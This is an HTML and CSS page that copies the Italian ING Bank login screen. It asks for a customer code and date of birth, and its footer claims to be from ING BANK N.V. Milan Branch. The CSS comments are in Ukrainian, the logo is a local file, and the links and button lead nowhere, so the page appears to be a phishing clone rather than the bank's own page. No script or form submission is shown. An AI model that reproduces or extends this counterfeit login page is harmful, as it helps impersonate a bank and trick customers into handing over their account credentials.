<!DOCTYPE html>
<html lang="it">
<head>
  <meta charset="UTF-8">
  <link rel="stylesheet" href="https://db.onlinewebfonts.com/c/69c633b2a4e41e8101c6f4f149655d5e?family=ING+Me+Regular">

  <title>ING Login</title>
  <style>
    body {
      margin: 0;
      font-family: "ING Me Regular", Arial, Helvetica, sans-serif;
      background-color: #f5f5f5;
      min-height: 100vh;
      display: flex;
      flex-direction: column;
    }

    header {
      padding: 15px;
      text-align: left;
      border-bottom: 1px solid #ddd;
      background: #fff;
      box-shadow: 1px 2px 3px rgba(0, 0, 0, 0.4);
      display: flex;
    }

    header img {
      height: 30px;
      margin-left: 17%;    
 

    }
    @media (max-width: 768px) {
  header img {
    margin-left: 0;
  }
}
    .container {
      flex: 1;
      display: flex;
      justify-content: center;
      align-items: center;
    }

    .login-box {
      display: flex;
      flex-direction: column;
      background: #fff;
      padding: 24px;
      border-radius: 5px;
      box-shadow: 1px 4px 8px rgba(0,0,0,0.3);
      text-align: left;
      width: 424px;
    } 
    
    @media (max-width: 768px) {
        .login-box {
       padding-top: 15px;
    }
}

    .login-box h2 {
      margin: 0 0 5px 0;
      color: #ff6200;
      font-size: 1.5rem;
      line-height: 2rem;
      font-weight: 600;
    }

    .login-box label {
      display: block;
      font-size: 17px;
      margin: 8px 0 5px;
      color: #333333;
      font-family: "ING Me Regular", Arial, Helvetica, sans-serif;
    }

    .login-box input {
  width: 45%;
  padding: 12px;
  font-size: 14px;
  border: 1px solid #000;
  border-radius: 3px;
  box-shadow: inset 1px 1px 1px rgba(0,0,0,0.11); /* всередину */
}
    .login-box label small {
      display: inline-block;
      color: #696969;
      font-size: 14px;
      font-weight: 400;
      line-height: 1.5;
    }

    .login-box button {
  margin-top: 40px;
  width: 28%;
  padding: 12px 1px;
  text-align: center;
  font-size: 18px;
  background-color: #ff6200;
  border: none;
  color: #fff;
  font-weight: 550;
  border-radius: 8px;
  cursor: pointer;
  /* box-shadow: 0 2px 6px rgba(0,0,0,0.25); /* зовнішня тінь */
}
.login-box button:hover {
  background-color: #d85e1a;
  box-shadow: 0 4px 10px rgba(0,0,0,0.3); /* сильніше при наведенні */
}
    .login-box .links {
      margin-top: 60px;
      font-size: 13px;
    }

    .login-box .links a {
      display: block;
      color: #525199;
      font-size: 16px;
      margin-bottom: 20px;
      position: relative;
      padding-left: 18px;
    }

    /* Оранжевий трикутник */
    .login-box .links a::before {
      content: "";
      position: absolute;
      left: 0;
      top: 50%;
      transform: translateY(-50%);
      width: 0;
      height: 0;
      border-left: 6px solid #f37021;
      border-top: 5px solid transparent;
      border-bottom: 5px solid transparent;
    }
    @media (max-width: 600px) {
        .login-box input {
  width: 25%;
  padding: 12px;
  font-size: 14px;
  border: 1px solid #000;
  border-radius: 3px;
  box-shadow: inset 1px 1px 1px rgba(0,0,0,0.11); /* всередину */
}
.login-box button {
  margin-top: 40px;
  width: 100%;
  padding: 12px 1px;
  text-align: center;
  font-size: 18px;
  background-color: #f37021;
  border: none;
  color: #fff;
  font-weight: bold;
  border-radius: 8px;
  cursor: pointer;
  /* box-shadow: 0 2px 6px rgba(0,0,0,0.25); /* зовнішня тінь */
}


    }
    footer {
        
  background: #d9d9d9;
  padding: 40px 40px;
  font-size: 13px;
  display: flex;
  flex-direction: column;
  align-items: center;
  padding-right: 400px;
  padding-bottom: 10px;
}

.footer-columns {
  display: flex;
  justify-content: center;
  gap: 200px; /* відстань між колонками */
  
}

.footer-columns .col {
  display: flex;
  flex-direction: column;
  gap: 10px; /* відстань між посиланнями */
  
}

footer a {
    color: #525199;
  text-decoration: none;
  font-size: 17px;
  font-weight: 500;
  display: inline-block; /* тепер це блочок, але по ширині тексту */
  width: fit-content; /* автоматична ширина під текст */
  border-bottom: 1px solid #525199;
  line-height: 1
}

footer .bottom-text {
    width: 100%;
  text-align: center;
  margin-top: 60px; /* було 40px, тепер на 20px нижче */
  color: #555;
  margin-right: 150px;
  
}
@media (max-width: 740px) {
    .footer-columns  {
  display: flex;
  text-align: center;
  margin: 0 auto;
  flex-direction: column;
  gap: 10px; /* відстань між посиланнями */
  
}
footer .bottom-text {
  width: 100%;
  text-align: center;
  margin-top: 30px;
  color: #555;

}
}

  </style>
</head>
<body>

  <header>
    <img src="./ing-logo.svg" alt="ING">
  </header>

  <div class="container">
    <div class="login-box">
      <h2>Ciao! Entra in ING</h2>
      <label for="">Inserisci le tue credenziali per accedere.</label>
      <label for="codice">Codice cliente</label>
      <input type="text" id="codice">

      <label for="dob">Data di nascita<br><small>Formato gg/mm/aaaa</small></label>
      <input type="text" id="dob">

      <button>Continua</button>

      <div class="links">
        <a href="#">Non ricordi il Codice Cliente?</a>
        <a href="#">È davvero ING? Verifica la chiamata</a>
      </div>
    </div>
  </div>

  <footer>
    <div class="footer-columns">
      <div class="col">
        <a href="#">Sicurezza</a>
        <a href="#">Definizione di Default</a>
        <a href="#">Privacy</a>
      </div>
      <div class="col">
        <a href="#">Trasparenza</a>
        <a href="#">Reclami</a>
        <a href="#">Cookies</a>
      </div>
    </div>
    <div class="bottom-text">
      © 2024 ING BANK N.V. Milan Branch P.I. 11241140158
    </div>
  </footer>
</body>
</html>
